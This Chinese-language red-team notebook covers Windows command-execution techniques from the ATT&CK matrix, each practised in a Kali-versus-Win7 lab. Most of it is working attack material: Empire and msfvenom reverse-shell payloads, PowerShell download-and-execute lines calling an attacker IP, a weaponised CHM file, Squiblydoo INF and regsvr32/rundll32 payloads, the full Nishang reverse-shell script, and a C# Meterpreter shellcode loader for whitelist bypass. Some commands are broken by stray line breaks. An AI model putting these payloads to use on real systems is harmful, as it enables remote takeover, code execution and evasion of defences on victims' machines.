目录
本地-Signed Script Proxy Execution(签名脚本代理执行)
Regsvcs/Regasm(.NET 服务安装工具/程序集注册工具)
Trusted Developer Utilities(值得信赖的开发者工具)
ATT&ck命令执行 —— 远程动态数据交换
Empire介绍
Empire 是一个纯粹的PowerShell 后开发代理建立在密码安全的通信和灵活的架构。
Empire 实现了无需powershell.exe 即可运行powershell代理的功能,从键盘记录到mimikatz等快速部署的后期开发模块,以及适应性通信以逃避网络检测,所有这些都包含在以可用性为中心的框架中。
git clone https://github.com/EmpireProject/Empire.git
cd Empire/setup
./install.sh
./empire
环境
攻击机 kali 192.168.243.133
受害机 win7 x64 192.168.243.154
- 设置监听
- 运行进行监听
- 生成木马
将生成的木马文件 /tmp/launcher.bat 在受害机器上【win7 x64】运行
- 输入 agents 进行回连查看信息
命令行界面
C:\Users\root\Desktop>PowerShell IEX (New- Object Net.WebClient).DownloadString( VPS/Invoke-PowerShellTcp.ps1');Invoverse -IPAddress 192.168.243.133 - Port 666
Nc -lvp 666
本地-Signed Script Proxy Execution(签名脚本代理执行)
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
在远程 web 服务器根目录写入 1.sct 文件如下: pubprn.vbs 方式
root@kali:~# cat 123.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true" >
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
Wscript 方式
启动 Empire 生成 vbs 脚本
设置监听地址信息
输入 “execute"运行,生成VBS代码;使用agents 列出列表
或者
C:\Users\root\Desktop>wscript launcher.vbs
执行一次,响应一次;获取目标代理
获取SHELL
agents
(Empire: agents) > interact RWACGHYM
(Empire: RWACGHYM) > shell ipconfig
chm
介绍
CHM 文件格式是微软于 1998 年推出的基于 HTML 文件特性的帮助文件系统,以替代早先的 WinHelp 帮助系统。它在 Windows 98 中把 CHM 类型文件称作“编译的 HTML 帮助文件”(Compiled HTML Help file);被 IE 浏览器支持的JavaScript, VBScript, ActiveX, Java Applet, Flash, 常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,CHM同样支持,并可以通过 URL 与 Internet 联系在一起;
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
创建恶意 chm 文件
SIP.html
<html>
<h1>blue team</h1>
<body>
Security
</body>
</html>
STA.html
<html>
<h1>blue team</h1>
<body>
Network
</body>
</html>
Index.html
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 he
ight=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe,-nop -w hidden -c IEX (New-Object
Net.WebClient).DownloadString('192.168.243.134/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.243.133 -Port 666">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
CMSTP
介绍
CMSTP是一个与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以通过恶意命令武器化,以脚本(SCT)和DLL的形式执行任意代码。它是一个受信任的Microsoft二进制文件,位于以下两个Windows目录中。
通过cmstp.exe命令执行,调用恶意的dll或者com脚本(sct)。这种方式可以绕过applocker或者其他白名单的防御方式以及UAC.
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64(192.168.243.154)
过程
1.通过 Metasploit Framework 的 msfvenom 生成恶意 DLL 文件 (pentestlab.dll)。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.243.133 LPORT=3333 -f dll > /root/Desktop/pentestlab.dll
INF 文件的 RegisterOCXSection 需要包含恶意 DLL 文件的本地路径或远程执行 的 WebDAV 位置。
cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Pentestlab" ShortSvcName="Pentestlab"
2、INF 文件的 RegisterOCXSection 需要包含恶意 DLL 文件的本地路径或远程执 行的 WebDAV 位置。
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
3、Metasploit multi/handler 模块需要配置为接收连接。
4、当恶意 INF 文件与 cmstp 一起提供时,代码 将会在后台执行。
cmstp.exe /s cmstp.inf
5、获得 Meterpreter 会话。
本地-CPL
介绍
CPL文件,是Windows控制面板扩展项,CPL全拼为Control Panel Item;
在系统安装目录的system32下面有一系列.cpl文件,它们分别对应着控制面板中的项目
CPL文件本质是Windows可执行性文件,但不属于可以直接独立运行的文件,通常由shell32.dll打开
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
第一步是创建一个 dll 并将其重命名为.cpl,以便它可以与控制面板一起 执行,Metasploit 的 Msfvenom 可以创建一个自定义的 dll,其中可以包含一个嵌 入的 meterpreter 有效载荷或者 Didier Stevens 的 cmd DLL 文件,可以用来绕过 禁止 cmd 运行的限制。
1、msfvenom 生成 payload
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.243.133 lport=3333 -f dll -o pentestlab.cpl
2、msf 设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.243.133
set LPORT 3333
exploit -j
3、以下命令将创建一个注册表键,这个注册表键的值将包含存储在主机上的 CPL 文件的路径。 默认情况下,标准用户对自己的配置单元是具有写入权限的。
reg add "HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Co ntrol Panel\Cpls" /v pentestlab.cpl /t REG_SZ /d "C:\cpl\pentestlab.cpl"
4.打开控制面板执行 payload 或者 control pentestlab.cpl,获取 Meterpreter 会 话
成功获取 session
本地-Forfiles
介绍
forfiles是windows自带的一个批量删除命令,对于时间的判断是通过文件自身的修改日期属性进行判断,使用它来对历史文件进行判断删除是个不错的选择。
forfiles 命令用来搜索不同盘符指定文件或文件夹, 更新软件或执行批处理程序都非常方便, 其语法为: forfiles /p 要搜索的文件夹或盘符 /m 要搜索的文件类型 /s 递归搜索文件 /c 执行文件命令
详细命令:https://www.jb51.net/softs/498793.html
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
1、forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
本地-IEExec
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe http://192.168.243.133/evil.exe
InfDefaultInstall
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64(192.168.243.154)
过程
InfDefaultInstall.exe shady.inf
[Version]
Signature=$CHICAGO$
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092 f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Mi nimalist.sct
InstaIIUtil
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
工具地址: https://github.com/khr0x40sh/WhiteListEvasion.git
例子
生成 sc 有效载荷 python InstallUtil.py --csfile temp.cs --exefile temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.243.133 --lport 443
实战演示
生成二进制文件 .\csc.exe pentestlab.cs
执行二进制文件 .\InstallUtil.exe /logfile= /logtoconsole=false /u pentestlab.exe
msf 设置
成功获取 session
获取 shell
MSHTA
介绍
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
攻击手法:
1、在 kali 上启动 Empire 框架后输入: listeners uselistener http set Host http://192.168.243.133 set Port 8080 execute
输出
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://192.168.243.133
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Name mshta
(Empire: listeners/http) > execute [*] Starting listener 'mshta' * Serving Flask app "http" (lazy loading) * Environment: production WARNING: Do not use the development server in a production environment. Use a production WSGI server instead. * Debug mode: off [+] Listener successfully started!
(Empire: listeners/http) > listeners [*] Active listeners: Name Module Host Delay/Jitter KillDate ---- ------ ---- ------------ ---- ---- mshta http http://192.168.243.133:8080 5/0.0
(Empire: listeners) >
Empire 生成 hta 文件
usestager windows/hta
set Listener http
set OutFile /root/Desktop/1.hta
execute
Python 开启 web 服务;
受害机执行 cd /root/Desktop/ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
Win7 执行:
mshta.exe http://10.100.19.19:80/1.hta [payload 监听的端口和下载的端口不能同一个]
Empire 成功收到受害机 shell
MSIexec
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
1、通过 msfvenom 生成 payload msfvenom -a x86 -f msi -p windows/exec CMD=calc.exe -o calc.png
2、搭建简单 web 服务器 python -m SimpleHTTPServer 80
3、在本地计算机上下载文件后,使用 msiexec 运行 payload msiexec /q /i http://192.168.243.133/calc.png
Pcalua
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
C:\windows\system32\pcalua.exe -a
C:\file.lnk C:\windows\system32\pcalua.exe -a notepad.exe
C:\windows\system32\pcalua.exe -a \\server\payload.dll(本地执行远程主机 payloa d)
Regsvcs/Regasm(.NET 服务安装工具/程序集注册工具)
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
1.使用 powershell 转换出 key.snk
PS D:\> $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2P WGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW 979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0q u/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv 7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNO E79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hito lufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0 361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRv kWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOef cacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7q eEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmt L6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLN iHfVjNi53Yg4='
PS D:\> $Content = [System.Convert]::FromBase64String($key)
PS D:\> Set-Content key.snk -Value $Content -Encoding Byte
2、MsfVenom 生成 C#版的 ShellCode,复制 ShellCode 到一个文件中命名为 regsvcs.cs
msfvenom -a x86 -platform Windows -p windows/meterpreter/reverse_tcp LHOST =10.100.19.19 LPORT=4444 -f csharp
![image](./images/7AF3D6434406451FB84F9676ED26B6C.png)
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter:
@subTee License: BSD 3-Clause Create Your Strong Name Key -> key.snk $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP 9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzV AgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaff HS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531 ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpV P1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh +WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsS VWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerj mDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEH PX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0 OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv 8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi5 3Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Byte C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseSe rvices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll [OR] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll //Executes UnRegisterClass If you don't have permissions C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll //This calls the UnregisterClass Method */ namespace regsvcser { public class Bypass : ServicedComponent { public Bypass() { Console.WriteLine("I am a basic COM Object"); } [ComRegisterFunction] //This executes if registration is successful public static void RegisterClass ( string key ) { Console.WriteLine("I shouldn't really execute"); Shellcode.Exec(); } [ComUnregisterFunction] //This executes if registration fails public static void UnRegisterClass ( string key ) { Console.WriteLine("I shouldn't really execute either."); Shellcode.Exec(); } } public class Shellcode { public static void Exec() { // native function's compiled code // generated with metasploit // executes calc.exe byte[] shellcode = new byte[341] { 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c, 0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54, 0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x64,0x13,0x13, 0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50, 0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5, 0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67, 0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff, 0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00, 0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56, 0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58, 0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5, 0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85, 0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1, 0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 }; UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); return; } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); } }
3、msf 设置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.243.133
set LHOST 4444
exploit -j
4、微软.NET 框架包含了一个可以在 cmd 中运行的 VC#
编译器并且可以生成恶意的 DLL 文件,key.snk 文件可以用来对生成的 DLL 作签名。
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseSe rvices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
5、执行 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
获得 Meterpreter 会话
regsvr32
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
工具地址:https://github.com/Hood3dRob1n/JSRat-Py.git
1、在 kali 上运行 JSRat.PY python JSRat.py -i 192.168.243.133 -p 3333
2、受害机执行命令 regsvr32.exe /u /n /s /i:http://192.168.243.133:3333/file.sct scrobj.dll
3.kali 成功获取受害机 shell
Rundll32
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
rundll32 AllTheThings.dll,EntryPoint rundll32 javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://rev erse-tcp.xyz/payload.sct");window.close(); rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20 ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-O bject Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratas hok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Rev erse -IPAddress 10.100.18.20 -Port 3333;" rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20Active XObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new% 20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseTe xt;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /i m rundll32.exe",0,true);} rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20Active XObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Scripting(脚本执行)
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
vbs 生成 vbs 代码
Bat 生成 bat 批处理文件
目标主机执行
Empire 成功获取 agent
执行系统命令
2.jscript
https://gist.github.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec
SyncAppvPublishingServer
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.100.19.19 LPORT=4 444 -f psh-reflection >4444.ps1 2、SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString(' http://10.100.19.19/4444.ps1');4444.ps1 | IEX"
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient). DownloadString('http://10.100.19.19/4444.ps1');4444.ps1"
未复现成功
Trusted Developer Utilities(值得信赖的开发者工具)
40.WMI (T1047)